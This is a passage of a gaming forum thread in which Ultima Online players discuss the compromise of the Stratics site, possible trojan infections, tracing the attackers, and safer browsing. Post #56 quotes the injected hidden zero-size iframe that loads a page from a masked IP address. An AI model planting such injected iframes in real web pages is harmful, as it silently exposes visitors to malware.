Jump to content

Welcome to Ultima Online Forums
Register now to gain access to all of our features. Once registered and logged in, you will be able to create topics, post replies to existing threads, give reputation to your fellow members, get your own private messenger, post status updates, manage your profile and so much more. This message will be removed once you have signed in.
Login to Account Create an Account

Welcome to UOForums

If not already a member, take a moment to join our awesome community. It is free to sign up and there are no ads.

 

When you click on CREATE ACCOUNT, the sign up form will appear at the bottom of the forum.

 

If you have issues, like not receiving a validation email. Then please contact us by email help@uoforums.com and we will help you get set up.

 

If you wish to contact us about our site for other reasons, then please contact us by using the contact form in top right corner of the forum


Photo

Stratics: Reported attack page!

- - - - -

  • This topic is locked This topic is locked
122 replies to this topic

#41
Adam

Adam

    Former Owner

  • Members
  • Pip
  • 9 posts
I just hope they find out how the person/s got in, otherwise any cleanup is pointless.

#42
Pitr

Pitr

    GRI Cadet

  • Members
  • 1,662 posts
how can they... link it ... to someone?
[SIGPIC][/SIGPIC]

#43
Taylor V. Smith

Taylor V. Smith

    Director of Stratics

  • Members
  • PipPipPip
  • 347 posts
  • LocationWashington, D.C.
Don't think it was the OT/NHB folks. They're pissed at TGN - not at Stratics. Many of them still love Stratics, they just don't feel welcome there anymore.

#44
Aurelius

Aurelius

    Advanced Member

  • Members
  • PipPipPip
  • 631 posts

Im not trying to access UOHall from Google.I am linking to it from Stratics main page.Does that make any difference ?


Not really, as Guido mentions - it's not 'Google' the search engine that's picking up and warning about a problem, it's a system of analytics that the Google 'corporation' run alongside their website indexing, which look for potential problems on websites. Those findings are used by some web browsers in determining what sites are safe to visit, and it's the web browser picking up on Google analytics data that generates the popup you see, not anything related directly to the 'Google' web search tool.

Essentially the security on your web browser asks the google database 'is there any known problem with this site I'm about to visit', and if there's anything in the Google data that points to there being a problem, your browser tells you that it may be unsafe to go there. You can tinker with the security settings, but I'd generally not recommend that unless you are really sure about what you are changing and why.

I'm not sure how long it takes for a site to become 'clean' again on the database though, once it's been flagged as a problem - I'd suspect a few days at least, although there may be a way for site owners to ask Google to re-check their site and if it's clear, take it off the 'problems' list.

#45
Aurelius

Aurelius

    Advanced Member

  • Members
  • PipPipPip
  • 631 posts

how can they... link it ... to someone?


To 'someone' is tricky, but since what looks to have happened would most likely need access directly to the boards and their database, it's quite possible..

I'd hope that any sensible company has a very good logging system for any access to the data - so if someone was stupid and logged in as a known administrator, for example, and then the data was modified, you have a pretty good pointer, although of course that does not mean the person who had admin rights did it, just that someone with their login and password did it. Potentially, it could be an 'invisible' account created by an admin at some point in the past, as a back door in to the system - trickier to find, but can be done if you know how to look.

They may (should!) also be logging access by IP, again so they could get an IP address that way. Even though there's a lot of talk about how IP addresses can be 'spoofed' or hidden, those methods of hiding are only effective up to a point. In this case, since it was clearly an attack on a company that would damage their finances, it's almost certainly a criminal offence, and if the right authorities start looking hard enough, most methods that people think make them 'safe' are pretty much worthless.

If it was a malicious attack, there is a chance they might not be able to track someone responsible - but it's certainly not impossible if you use the right tools and have the right people looking.

#46
Llewen

Llewen

    Advanced Member

  • Members
  • PipPipPip
  • 93 posts
Well, as I posted on Stratics, the funniest thing to me in the whole incident was when someone was trying to access the Stratics forums, and Firefox wouldn't let them, so they switched to IE 6, and that worked just fine... The LAST browser in the world I would want to be using if I was accessing a compromised site... :)

#47
Adam

Adam

    Former Owner

  • Members
  • Pip
  • 9 posts
I'm just wondering how many people got infected with any of the 4? trojans and don't realise it.

And/or if they're gaming accounts (not to mention other sensitive info) is now at risk.

#48
Llewen

Llewen

    Advanced Member

  • Members
  • PipPipPip
  • 93 posts

I'm just wondering how many people got infected with any of the 4? trojans and don't realise it.

And/or if they're gaming accounts (not to mention other sensitive info) is now at risk.


Well some people reported that they suddenly had all kinds of crap popping up on their screen and their computers slowed to a crawl. That's a pretty good indication you're in trouble...

#49
Guido

Guido

    Ultima Franchise Managing Editor and Site Moderator

  • Administrators
  • 2,005 posts

Well, as I posted on Stratics, the funniest thing to me in the whole incident was when someone was trying to access the Stratics forums, and Firefox wouldn't let them, so they switched to IE 6, and that worked just fine... The LAST browser in the world I would want to be using if I was accessing a compromised site... :)


I still can't access the forums with FF - only IE (in this case, 8 - and I hate using my desktop to surf the web, to the point where I don't have any browser normally installed on it, and I had to turn on IE to make it work).

Esse Quam Videri
Out on the road today I saw a Black Flag Sticker on a Cadillac...

fs_pc.png


#50
Corvak

Corvak

    Huzzah!!

  • Members
  • 3,808 posts
IE6....

It's like a giant downloadable security hole.

#51
Tancred RedStar

Tancred RedStar

    Balron Snack

  • Members
  • 5,379 posts
Be interesting to see if there's a sudden spate of hijacked or stripped accounts, and further, if there's any sort of recourse or liability?

I'm just wondering how many people got infected with any of the 4? trojans and don't realise it.

And/or if they're gaming accounts (not to mention other sensitive info) is now at risk.



#52
Tancred RedStar

Tancred RedStar

    Balron Snack

  • Members
  • 5,379 posts
lol, altho to be fair, the earlier versions of FF weren't so great either.

IE6....

It's like a giant downloadable security hole.



#53
Gnomy

Gnomy

    Forum Legend

  • Members
  • 4,946 posts
I'd sue stratics if i noticed my accounts hacked or bank info or whatever.

But.. im safe since i never visit that site :P

Posted Image


#54
Nok

Nok

    Founder/Publisher of GameXbar

  • Members
  • 3,217 posts
  • LocationLos Angeles, CA
It's not just Stratics...

44 Million Stolen Gaming Credentials Uncovered | Symantec Connect

Posted Image
GameXbar: DAoC - LOTRO - MMO - UO - WAR - WoW


#55
Adam

Adam

    Former Owner

  • Members
  • Pip
  • 9 posts
Sounds like they haven't fixed the problem entirely, the Iframe references came back again today.

#56
Adam

Adam

    Former Owner

  • Members
  • Pip
  • 9 posts
Yea, it's definatly back again, I noticed the iframe reference again when using Firefox.

iframe src=http://xx.xx.xx.xx/files/articles/News/wow.htm width=0 height=0 /iframe

#57
Evolus

Evolus

    Worst Tamer Ever

  • Members
  • PipPipPip
  • 359 posts
I ran a virus scan using AVG free but no trojans were detected. I use Google Chrome as my web browser. Am I safe?

This has got me worried now.

#58
Adam

Adam

    Former Owner

  • Members
  • Pip
  • 9 posts
Should be ok, I found a website which scans for malicious content

Website Security Check - Unmask Parasites

Stratics' forums currently show as suspicious and it shows the hidden iframe code
So yea, it's still infected.

#59
Evolus

Evolus

    Worst Tamer Ever

  • Members
  • PipPipPip
  • 359 posts
Thanks Adam, I'll do that when I get home. I would hate to have my accounts hacked.

#60
Llewen

Llewen

    Advanced Member

  • Members
  • PipPipPip
  • 93 posts
Firefox with NoScript is a great way to protect yourself from problems like this - as long as your default action is to block scripts. But it's like links in emails or attachments, you should only allow them if you already know what they are. If you don't know what they are, block them. You should also always have your cookies on prompt, so you have to accept cookies before they download to your computer.